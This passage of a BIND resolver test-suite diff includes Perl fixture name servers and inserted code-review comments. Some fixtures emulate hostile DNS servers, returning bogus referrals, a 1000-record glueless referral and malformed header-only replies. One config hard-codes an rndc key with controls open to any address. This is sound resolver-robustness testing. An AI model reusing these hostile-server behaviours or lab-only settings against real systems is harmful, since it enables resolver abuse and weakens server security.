= &a6; + } else { + fprintf(stderr, "invalid address %s\n", + isc_commandline_argument); + exit(1); + } + break; + case 'e': + is_sep = true; + break; + case 'S': + if (altserver != NULL) { + fprintf(stderr, + 
"alternate server " + "already defined: %s\n", + altserver); + exit(1); + } + altserver = isc_commandline_argument; + break; + case 's': + if (server != NULL) { + fprintf(stderr, + "server " + "already defined: %s\n", + server); + exit(1); + } + server = isc_commandline_argument; + break; + case 'k': + keynamestr = isc_commandline_argument; + break; + case 'K': + keystr = isc_commandline_argument; + break; + case 'p': + port = isc_commandline_argument; + break; + default: + usage(); + } + } + + argc -= isc_commandline_index; + argv += isc_commandline_index; + if (argc < 1) { + usage(); + } + + if (altserver != NULL) { + char *cp; + + cp = strchr(altserver, ':'); + if (cp == NULL) { + fprintf(stderr, "invalid alternate server: %s\n", + altserver); + exit(1); + } + *cp = '\0'; + altservername = altserver; + altserveraddr = cp + 1; + } + + isc_lib_register(); + result = dns_lib_init(); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "dns_lib_init failed: %u\n", result); + exit(1); + } + + isc_mem_create(&mctx); + + result = isc_appctx_create(mctx, &actx); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_app_ctxstart(actx); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_socketmgr_create(mctx, &socketmgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + result = isc_timermgr_create(mctx, &timermgr); + if (result != ISC_R_SUCCESS) { + goto cleanup; + } + + clientopt = 0; + result = dns_client_create(mctx, actx, taskmgr, socketmgr, timermgr, + clientopt, &client, addr4, addr6); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "dns_client_create failed: %u, %s\n", result, + isc_result_totext(result)); + exit(1); + } + + /* Set the nameserver */ + if (server == NULL) { + irs_resconf_t *resconf = NULL; + isc_sockaddrlist_t *nameservers; + + result = irs_resconf_load(mctx, "/etc/resolv.conf", &resconf); + if 
(result != ISC_R_SUCCESS && result != ISC_R_FILENOTFOUND) { + fprintf(stderr, "irs_resconf_load failed: %u\n", + result); + exit(1); + } + nameservers = irs_resconf_getnameservers(resconf); + result = dns_client_setservers(client, dns_rdataclass_in, NULL, + nameservers); + if (result != ISC_R_SUCCESS) { + irs_resconf_destroy(&resconf); + fprintf(stderr, "dns_client_setservers failed: %u\n", + result); + exit(1); + } + irs_resconf_destroy(&resconf); + } else { + addserver(client, server, port, NULL); + } + + /* Set the alternate nameserver (when specified) */ + if (altserver != NULL) { + addserver(client, altserveraddr, port, altservername); + } + + /* Install DNSSEC key (if given) */ + if (keynamestr != NULL) { + if (keystr == NULL) { + fprintf(stderr, "key string is missing " + "while key name is provided\n"); + exit(1); + } + set_key(client, keynamestr, keystr, is_sep, &keymctx); + } + + /* Construct qname */ + namelen = strlen(argv[0]); + isc_buffer_init(&b, argv[0], namelen); + isc_buffer_add(&b, namelen); + qname = dns_fixedname_initname(&qname0); + result = dns_name_fromtext(qname, &b, dns_rootname, 0, NULL); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "failed to convert qname: %u\n", result); + } + + /* Perform resolution */ + if (keynamestr == NULL) { + resopt |= DNS_CLIENTRESOPT_NODNSSEC; + } + ISC_LIST_INIT(namelist); + result = dns_client_resolve(client, qname, dns_rdataclass_in, type, + resopt, &namelist); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "resolution failed: %s\n", + dns_result_totext(result)); + } + for (name = ISC_LIST_HEAD(namelist); name != NULL; + name = ISC_LIST_NEXT(name, link)) + { + for (rdataset = ISC_LIST_HEAD(name->list); rdataset != NULL; + rdataset = ISC_LIST_NEXT(rdataset, link)) + { + if (printdata(rdataset, name) != ISC_R_SUCCESS) { + fprintf(stderr, "print data failed\n"); + } + } + } + + dns_client_freeresanswer(client, &namelist); + + /* Cleanup */ +cleanup: + dns_client_destroy(&client); + + if (taskmgr != 
NULL) { + isc_managers_destroy(&netmgr, &taskmgr); + } + if (timermgr != NULL) { + isc_timermgr_destroy(&timermgr); + } + if (socketmgr != NULL) { + isc_socketmgr_destroy(&socketmgr); + } + if (actx != NULL) { + isc_appctx_destroy(&actx); + } + isc_mem_detach(&mctx); + + if (keynamestr != NULL) { + isc_mem_destroy(&keymctx); + } + dns_lib_shutdown(); + + return (0); +} diff --git a/bin/tests/system/resolver/ans2/ans.pl b/bin/tests/system/resolver/ans2/ans.pl new file mode 100644 index 0000000..7876508 --- /dev/null +++ b/bin/tests/system/resolver/ans2/ans.pl 
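Review bot: In `main`, a failed `dns_name_fromtext()` on the query name only prints "failed to convert qname" and then falls through to `dns_client_resolve()` with a `qname` that was never successfully set, whereas the name conversions in `set_key` and `addserver` exit on failure. Add `exit(1);` after that `fprintf` so a malformed hostname argument cannot reach the resolver. Separately, the early `goto cleanup` paths run `dns_client_destroy(&client)` while `client` is still NULL; whether that is tolerated depends on `dns_client_destroy`, which is not shown here, so an `if (client != NULL)` guard like the ones used for the managers would be safer. The program also returns 0 when resolution fails, so a calling test can only detect the failure from stderr.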
@@ -0,0 +1,140 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.2", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + if ($qname eq "com" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("com 300 NS a.root-servers.nil.")); + } elsif ($qname eq "example.com" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.com 300 NS a.root-servers.nil.")); + } elsif ($qname eq "cname1.example.com") { + # Data for the "cname + other data / 1" test + $packet->push("answer", new 
Net::DNS::RR("cname1.example.com 300 CNAME cname1.example.com")); + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 A 1.2.3.4")); + } elsif ($qname eq "cname2.example.com") { + # Data for the "cname + other data / 2" test: same RRs in opposite order + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 A 1.2.3.4")); + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 CNAME cname2.example.com")); + } elsif ($qname =~ /redirect\.com/) { + $packet->push("authority", new Net::DNS::RR("redirect.com 300 NS ns.redirect.com")); + $packet->push("additional", new Net::DNS::RR("ns.redirect.com 300 A 10.53.0.6")); + } elsif ($qname =~ /\.tld1/) { + $packet->push("authority", new Net::DNS::RR("tld1 300 NS ns.tld1")); + $packet->push("additional", new Net::DNS::RR("ns.tld1 300 A 10.53.0.6")); + } elsif ($qname =~ /\.tld2/) { + $packet->push("authority", new Net::DNS::RR("tld2 300 NS ns.tld2")); + $packet->push("additional", new Net::DNS::RR("ns.tld2 300 A 10.53.0.7")); + } elsif ($qname eq "org" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("org 300 NS a.root-servers.nil.")); + } elsif ($qname eq "example.org" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.org 300 NS a.root-servers.nil.")); + } elsif (($qname eq "baddname.example.org" || $qname eq "gooddname.example.org") && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("example.org 300 NS a.root-servers.nil.")); + } elsif ($qname eq "www.example.org" || + $qname eq "badcname.example.org" || + $qname eq "goodcname.example.org" || + $qname eq "foo.baddname.example.org" || + $qname eq "foo.gooddname.example.org") { + # Data for address/alias filtering. + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . 
+ " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "net" && $qtype eq "NS") { + $packet->header->aa(1); + $packet->push("answer", new Net::DNS::RR("net 300 NS a.root-servers.nil.")); + } elsif ($qname =~ /example\.net/) { + $packet->push("authority", new Net::DNS::RR("example.net 300 NS ns.example.net")); + $packet->push("additional", new Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname =~ /sub\.example\.org/) { + # Data for CNAME/DNAME filtering. The final answers are + # expected to be accepted regardless of the filter setting. + $packet->push("authority", new Net::DNS::RR("sub.example.org 300 NS ns.sub.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.sub.example.org 300 A 10.53.0.3")); + } elsif ($qname =~ /glue-in-answer\.example\.org/) { + $packet->push("answer", new Net::DNS::RR("ns.glue-in-answer.example.org 300 A 10.53.0.3")); + $packet->push("authority", new Net::DNS::RR("glue-in-answer.example.org 300 NS ns.glue-in-answer.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.glue-in-answer.example.org 300 A 10.53.0.3")); + } elsif ($qname =~ /\.broken/ || $qname =~ /^broken/) { + # Delegation to broken TLD. + $packet->push("authority", new Net::DNS::RR("broken 300 NS ns.broken")); + $packet->push("additional", new Net::DNS::RR("ns.broken 300 A 10.53.0.4")); + } else { + # Data for the "bogus referrals" test + $packet->push("authority", new Net::DNS::RR("below.www.example.com 300 NS ns.below.www.example.com")); + $packet->push("additional", new Net::DNS::RR("ns.below.www.example.com 300 A 10.53.0.3")); + } + + $sock->send($packet->data); + + print "RESPONSE:\n"; + $packet->print; + print "\n"; +} diff --git a/bin/tests/system/resolver/ans3/ans.pl b/bin/tests/system/resolver/ans3/ans.pl new file mode 100644 index 0000000..d4d7ae7 --- /dev/null +++ b/bin/tests/system/resolver/ans3/ans.pl 
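Review bot: The receive loop dereferences `$questions[0]` without checking that the request carried a question, and it `die`s on any datagram `Net::DNS::Packet` cannot parse, so one stray or malformed packet on the port stops this fixture and the remaining resolver tests fail for an unrelated reason. Skip such packets instead, for example `next unless @questions;` before the `qname` lookup, and log rather than `die` on a parse error. The same pattern is in `handleQuery` in ans3/ans.pl and in `handleUDP`/`handleTCP` in ans8/ans.pl, where the equivalent guard is an early return that the caller checks before sending. `$buf` is also used without `my` here, since this script does not enable `use strict`.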
@@ -0,0 +1,183 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $server_addr = "10.53.0.3"; + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub handleQuery { + my $buf = shift; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + if ($qname eq "example.net" && $qtype eq "NS") { + $packet->push("answer", new Net::DNS::RR($qname . 
" 300 NS ns.example.net")); + $packet->push("additional", new Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname eq "ns.example.net") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 10.53.0.3")); + } elsif ($qname eq "nodata.example.net") { + # Do not add a SOA RRset. + } elsif ($qname eq "nxdomain.example.net") { + # Do not add a SOA RRset. + $packet->header->rcode(NXDOMAIN); + } elsif ($qname eq "www.example.net") { + # Data for address/alias filtering. + if ($qtype eq "A") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "badcname.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME badcname.example.org")); + } elsif (($qname eq "baddname.example.net" || $qname eq "gooddname.example.net") && $qtype eq "NS") { + $packet->push("authority", new Net::DNS::RR("example.net IN SOA (1 2 3 4 5)")) + } elsif ($qname eq "foo.baddname.example.net") { + $packet->push("answer", + new Net::DNS::RR("baddname.example.net" . + " 300 DNAME baddname.example.org")); + } elsif ($qname eq "foo.gooddname.example.net") { + $packet->push("answer", + new Net::DNS::RR("gooddname.example.net" . + " 300 DNAME gooddname.example.org")); + } elsif ($qname eq "goodcname.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME goodcname.example.org")); + } elsif ($qname =~ /^nodata\.example\.net$/i) { + $packet->header->aa(1); + } elsif ($qname =~ /^nxdomain\.example\.net$/i) { + $packet->header->aa(1); + $packet->header->rcode(NXDOMAIN); + } elsif ($qname eq "large-referral.example.net") { + for (my $i = 1; $i < 1000; $i++) { + $packet->push("authority", new Net::DNS::RR("large-referral.example.net 300 NS ns" . $i . 
".fake.redirect.com")); + } + # No glue records + } elsif ($qname eq "foo.bar.sub.tld1") { + $packet->push("answer", new Net::DNS::RR("$qname 300 TXT baz")); + } elsif ($qname eq "cname.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME ok.sub.example.org")); + } elsif ($qname eq "ok.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "www.dname.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR("dname.sub.example.org" . + " 300 DNAME ok.sub.example.org")); + } elsif ($qname eq "www.ok.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "foo.glue-in-answer.example.org") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "ns.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 10.53.0.3")); + } else { + $packet->push("answer", new Net::DNS::RR("www.example.com 300 A 1.2.3.4")); + } + + print "RESPONSE:\n"; + $packet->print; + + return $packet->data; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = handleQuery($buf); + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = handleQuery($buf); + $len = length($result); + $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($result, $len); + print " Sent: $n chars via TCP\n"; + 
} + $conn->close; + } +} diff --git a/bin/tests/system/resolver/ans8/ans.pl b/bin/tests/system/resolver/ans8/ans.pl new file mode 100644 index 0000000..8c32915 --- /dev/null +++ b/bin/tests/system/resolver/ans8/ans.pl 
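Review bot: The TCP branch treats a single `sysread` as returning the whole 2-byte length prefix and then the whole message, but `sysread` may return fewer bytes than requested when a query arrives in more than one segment, and the `last unless $n == $len` check then drops the connection mid-message. Reading in a loop until the requested count is reached (or EOF/error) makes the framing reliable; the identical loop in ans8/ans.pl has the same issue. In `handleQuery`, the second `elsif ($qname eq "ns.example.net")` branch near the end can never run because the same test appears earlier in the chain, and can be removed.

```perl
# Read exactly $want bytes from $conn; undef on EOF or error.
sub readExactly {
	my ($conn, $want) = @_;
	my $data = '';
	while (length($data) < $want) {
		my $n = $conn->sysread($data, $want - length($data), length($data));
		return undef unless $n;
	}
	return $data;
}

# … unchanged: select loop and UDP branch …
		my $lenbuf = readExactly($conn, 2);
		last unless defined $lenbuf;
		my $len = unpack("n", $lenbuf);
		$buf = readExactly($conn, $len);
		last unless defined $buf;
		# … unchanged: handleQuery call and length-prefixed reply …
```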
@@ -0,0 +1,168 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.8"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$localport.\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $response = new Net::DNS::Packet($qname, $qtype, $qclass); + $response->header->qr(1); + $response->header->aa(1); + 
$response->header->tc(0); + $response->header->id($id); + + # Responses to queries for no-questions/NS and ns.no-questions/A are + # _not_ malformed or truncated. + if ($qname eq "no-questions" && $qtype eq "NS") { + $response->push("answer", new Net::DNS::RR($qname . " 300 NS ns.no-questions")); + $response->push("additional", new Net::DNS::RR("ns.no-questions. 300 A 10.53.0.8")); + return $response->data; + } elsif ($qname eq "ns.no-questions") { + $response->push("answer", new Net::DNS::RR($qname . " 300 A 10.53.0.8")) + if ($qtype eq "A"); + return $response->data; + } elsif ($qname =~ /\.formerr-to-all$/) { + $response->header->rcode("FORMERR"); + return $response->data; + } + + # don't use Net::DNS to construct the header only reply as early + # versions just get it completely wrong. + + if ($qname eq "truncated.no-questions") { + # QR, AA, TC + return (pack("nnnnnn", $id, 0x8600, 0, 0, 0, 0)); + } + # QR, AA + return (pack("nnnnnn", $id, 0x8400, 0, 0, 0, 0)); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my @results = (); + my $response = new Net::DNS::Packet($qname, $qtype, $qclass); + + $response->header->qr(1); + $response->header->aa(1); + $response->header->id($id); + + $response->push("answer", new Net::DNS::RR("$qname 300 A 1.2.3.4")); + push(@results, $response->data); + + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + 
$udpsock->recv($buf, 512); + my $result = handleUDP($buf); + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = handleTCP($buf); + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + $conn->close; + } +} diff --git a/bin/tests/system/resolver/clean.sh b/bin/tests/system/resolver/clean.sh new file mode 100644 index 0000000..06d74fc --- /dev/null +++ b/bin/tests/system/resolver/clean.sh 
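Review bot: `handleUDP` and `handleTCP` open with the same version-dependent `Net::DNS::Packet` parsing and question extraction, copied line for line; a small shared helper that returns the parsed request would keep the two from drifting apart. `Data::Dumper` is loaded but not used anywhere in this hunk, and `use strict` comes after the other `use` lines; putting `use strict;` first and dropping the unused import is the usual layout.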
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after resolver tests.
+#
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.run
+rm -f */ans.run
+rm -f */*.jdb
+rm -f dig.out dig.out.* dig.*.out.*
+rm -f dig.*.foo.*
+rm -f dig.*.bar.*
+rm -f dig.*.prime.*
+rm -f ns4/tld.db
+rm -f ns6/K*
+rm -f ns6/example.net.db.signed ns6/example.net.db
+rm -f ns6/ds.example.net.db.signed ns6/ds.example.net.db
+rm -f ns6/dsset-ds.example.net*
+rm -f ns6/dsset-example.net* ns6/example.net.db.signed.jnl
+rm -f ns6/named.stats*
+rm -f ns6/to-be-removed.tld.db ns6/to-be-removed.tld.db.jnl
+rm -f ns7/server.db ns7/server.db.jnl
+rm -f resolve.out.*.test*
+rm -f .digrc
+rm -f ns*/named.lock
+rm -f ns5/trusted.conf
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/resolver/ns1/chaostest.db b/bin/tests/system/resolver/ns1/chaostest.db
new file mode 100644
index 0000000..153f31d
--- /dev/null
+++ b/bin/tests/system/resolver/ns1/chaostest.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ CHAOS SOA @ @ 1970010100 86400 600 86400 300
+@ CHAOS NS @
+version CHAOS TXT "CH 1.0"
+hostname CHAOS TXT "unknown"
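Review bot: Every `rm -f` in clean.sh takes a path relative to the current directory (`*/named.conf`, `ns6/K*`, `.digrc`), and the script never changes into its own directory, so started from anywhere else it silently deletes whatever matches there. How the harness invokes it is not visible in this hunk; if the working directory is not already guaranteed by the caller, add `cd "$(dirname "$0")" || exit 1` before the first `rm`. At minimum the header comment should state the directory the script expects to run in.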
diff --git a/bin/tests/system/resolver/ns1/named.conf.in b/bin/tests/system/resolver/ns1/named.conf.in
new file mode 100644
index 0000000..7ca1caf
--- /dev/null
+++ b/bin/tests/system/resolver/ns1/named.conf.in
@@ -0,0 +1,79 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1 dscp 1;
+ notify-source 10.53.0.1 dscp 2;
+ transfer-source 10.53.0.1 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; }
+ except-from { "example.org"; };
+ deny-answer-aliases { "example.org"; }
+ except-from { "goodcname.example.net";
+ "gooddname.example.net"; };
+ allow-query {!10.53.0.8; any; };
+ max-zone-ttl unlimited;
+ attach-cache "globalcache";
+};
+
+server 10.53.0.3 {
+ tcp-only yes;
+};
+
+server 10.42.23.3/32 {
+ notify-source 10.42.22.1;
+ query-source address 10.42.22.1 port 0;
+ transfer-source 10.42.22.1;
+};
+
+server fd92:7065:b8e:ffff::1000 {
+ notify-source-v6 fd92:7065:b8e:ffff::1001;
+ query-source-v6 address fd92:7065:b8e:ffff::1001 port 0;
+ transfer-source-v6 fd92:7065:b8e:ffff::1001;
+};
+
+/*
+ * Must be first view so that there is a CH cache with name
+ * "globalcache" before the recursive "default"/IN view is configured.
+ */
+view "class" chaos {
+ zone "chaostest" CHAOS {
+ type primary;
+ file "chaostest.db";
+ };
+};
+
+/*
+ * Must be second view so that so that we can check we don't attach to the
+ * "globalcache"/CH cache.
+ */
+view "default" {
+ zone "." {
+ type hint;
+ file "root.hint";
+ };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm @DEFAULT_HMAC@;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
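Review bot: `dnssec-validation yes;` in the options block has no trust anchor behind it in this file: there is no `trust-anchors` statement and no `include`, and with that setting named validates only against manually configured anchors, so unless an anchor is supplied some other way not visible here this resolver validates nothing. ns5/named.conf.in in this commit has the same combination. If that is what the tests want, record it next to the option, e.g. `/* no trust anchor is configured, so responses are never actually validated */`; otherwise the anchor file needs to be included. Separately, the comment above `view "default"` repeats "so that so that".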
diff --git a/bin/tests/system/resolver/ns1/root.hint b/bin/tests/system/resolver/ns1/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/resolver/ns1/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/resolver/ns4/broken.db b/bin/tests/system/resolver/ns4/broken.db new file mode 100644 index 0000000..eb64f85 --- /dev/null +++ b/bin/tests/system/resolver/ns4/broken.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +$TTL 5 +sub.broken. NS ns.sub.broken. +ns.sub.broken. A 